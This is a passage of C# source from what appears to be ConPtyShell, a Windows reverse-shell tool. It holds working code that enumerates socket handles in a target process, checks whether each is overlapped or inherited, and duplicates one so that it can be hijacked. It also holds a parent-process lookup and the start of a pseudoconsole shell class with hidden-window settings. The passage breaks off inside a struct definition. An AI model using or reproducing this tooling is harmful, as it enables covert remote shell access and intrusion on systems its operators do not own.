public static bool IsSocketInherited(IntPtr socketHandle, Process parentProcess)
{
bool inherited = false;
List<IntPtr> parentSocketsHandles = GetSocketsTargetProcess(parentProcess);
if (parentSocketsHandles.Count < 1)
return inherited;
foreach (IntPtr parentSocketHandle in parentSocketsHandles)
{
SOCKADDR_IN sockaddrTargetProcess = new SOCKADDR_IN();
SOCKADDR_IN sockaddrParentProcess = new SOCKADDR_IN();
int sockaddrTargetProcessLen = Marshal.SizeOf(sockaddrTargetProcess);
int sockaddrParentProcessLen = Marshal.SizeOf(sockaddrParentProcess);
if (
(getpeername(socketHandle, ref sockaddrTargetProcess, ref sockaddrTargetProcessLen) == 0) &&
(getpeername(parentSocketHandle, ref sockaddrParentProcess, ref sockaddrParentProcessLen) == 0) &&
(sockaddrTargetProcess.sin_addr == sockaddrParentProcess.sin_addr && sockaddrTargetProcess.sin_port == sockaddrParentProcess.sin_port)
)
{
// Console.WriteLine("debug: found inherited socket! handle --> 0x" + parentSocketHandle.ToString("X4"));
inherited = true;
}
closesocket(parentSocketHandle);
}
return inherited;
}
public static bool IsSocketOverlapped(IntPtr socket)
{
bool ret = false;
IntPtr sockEvent = IntPtr.Zero;
int ntStatus = -1;
SOCKET_CONTEXT contextData = new SOCKET_CONTEXT();
ntStatus = NtCreateEvent(ref sockEvent, EVENT_ALL_ACCESS, IntPtr.Zero, SynchronizationEvent, false);
if (ntStatus != NTSTATUS_SUCCESS)
{
// Console.WriteLine("debug: NtCreateEvent failed with error code 0x" + ntStatus.ToString("X8")); ;
return ret;
}
IO_STATUS_BLOCK IOSB = new IO_STATUS_BLOCK();
ntStatus = NtDeviceIoControlFile1(socket, sockEvent, IntPtr.Zero, IntPtr.Zero, ref IOSB, IOCTL_AFD_GET_CONTEXT, IntPtr.Zero, 0, ref contextData, Marshal.SizeOf(contextData));
// Wait for Completion
if (ntStatus == NTSTATUS_PENDING)
{
WaitForSingleObject(sockEvent, INFINITE);
ntStatus = IOSB.status;
}
CloseHandle(sockEvent);
if (ntStatus != NTSTATUS_SUCCESS)
{
// Console.WriteLine("debug: NtDeviceIoControlFile failed with error code 0x" + ntStatus.ToString("X8")); ;
return ret;
}
if ((contextData.SharedData.CreationFlags & WSA_FLAG_OVERLAPPED) != 0) ret = true;
return ret;
}
public static IntPtr DuplicateTargetProcessSocket(Process targetProcess, ref bool overlappedSocket)
{
IntPtr targetSocketHandle = IntPtr.Zero;
List<IntPtr> targetProcessSockets = GetSocketsTargetProcess(targetProcess);
if (targetProcessSockets.Count < 1) return targetSocketHandle;
else
{
foreach (IntPtr socketHandle in targetProcessSockets)
{
// we prioritize the hijacking of Overlapped sockets
if (!IsSocketOverlapped(socketHandle))
{
// Console.WriteLine("debug: Found a usable socket, but it has not been created with the flag WSA_FLAG_OVERLAPPED, skipping...");
continue;
}
targetSocketHandle = socketHandle;
overlappedSocket = true;
break;
}
// no Overlapped sockets found, expanding the scope by including also Non-Overlapped sockets
if (targetSocketHandle == IntPtr.Zero) {
// Console.WriteLine("debug: No overlapped sockets found. Trying to return also non-overlapped sockets...");
foreach (IntPtr socketHandle in targetProcessSockets)
{
targetSocketHandle = socketHandle;
if (!IsSocketOverlapped(targetSocketHandle)) overlappedSocket = false;
break;
}
}
}
if (targetSocketHandle == IntPtr.Zero)
throw new ConPtyShellException("No sockets found, so no hijackable sockets :( Exiting...");
return targetSocketHandle;
}
public static void SetSocketBlockingMode(IntPtr socket, int mode)
{
int FIONBIO = -2147195266;
int NonBlockingMode = 1;
int BlockingMode = 0;
int result;
if (mode == 1)
result = ioctlsocket(socket, FIONBIO, ref NonBlockingMode);
else
result = ioctlsocket(socket, FIONBIO, ref BlockingMode);
if (result == -1)
throw new ConPtyShellException("ioctlsocket failed with return code " + result.ToString() + " and wsalasterror: " + WSAGetLastError().ToString());
}
}
// source from --> https://stackoverflow.com/a/3346055
[StructLayout(LayoutKind.Sequential)]
public struct ParentProcessUtilities
{
// These members must match PROCESS_BASIC_INFORMATION
internal IntPtr Reserved1;
internal IntPtr PebBaseAddress;
internal IntPtr Reserved2_0;
internal IntPtr Reserved2_1;
internal IntPtr UniqueProcessId;
internal IntPtr InheritedFromUniqueProcessId;
[DllImport("ntdll.dll")]
private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
public static Process GetParentProcess()
{
return GetParentProcess(Process.GetCurrentProcess().Handle);
}
public static Process GetParentProcess(int id)
{
Process process = Process.GetProcessById(id);
return GetParentProcess(process.Handle);
}
public static Process GetParentProcess(IntPtr handle)
{
ParentProcessUtilities pbi = new ParentProcessUtilities();
int returnLength;
int status = NtQueryInformationProcess(handle, 0, ref pbi, Marshal.SizeOf(pbi), out returnLength);
if (status != 0)
throw new ConPtyShellException(status.ToString());
try
{
return Process.GetProcessById(pbi.InheritedFromUniqueProcessId.ToInt32());
}
catch (ArgumentException)
{
// not found
return null;
}
}
}
public static class ConPtyShell
{
private const string errorString = "{{{ConPtyShellException}}}\r\n";
private const uint ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004;
private const uint DISABLE_NEWLINE_AUTO_RETURN = 0x0008;
private const uint PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE = 0x00020016;
private const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
private const int STARTF_USESTDHANDLES = 0x00000100;
private const int BUFFER_SIZE_PIPE = 1048576;
private const int WSA_FLAG_OVERLAPPED = 0x1;
private const UInt32 INFINITE = 0xFFFFFFFF;
private const int SW_HIDE = 0;
private const uint GENERIC_READ = 0x80000000;
private const uint GENERIC_WRITE = 0x40000000;
private const uint FILE_SHARE_READ = 0x00000001;
private const uint FILE_SHARE_WRITE = 0x00000002;
private const uint FILE_ATTRIBUTE_NORMAL = 0x80;
private const uint OPEN_EXISTING = 3;
private const int STD_INPUT_HANDLE = -10;
private const int STD_OUTPUT_HANDLE = -11;
private const int STD_ERROR_HANDLE = -12;
private const int WSAEWOULDBLOCK = 10035;
private const int FD_READ = (1 << 0);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct STARTUPINFOEX
{
public STARTUPINFO StartupInfo;
public IntPtr lpAttributeList;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
private struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
private struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;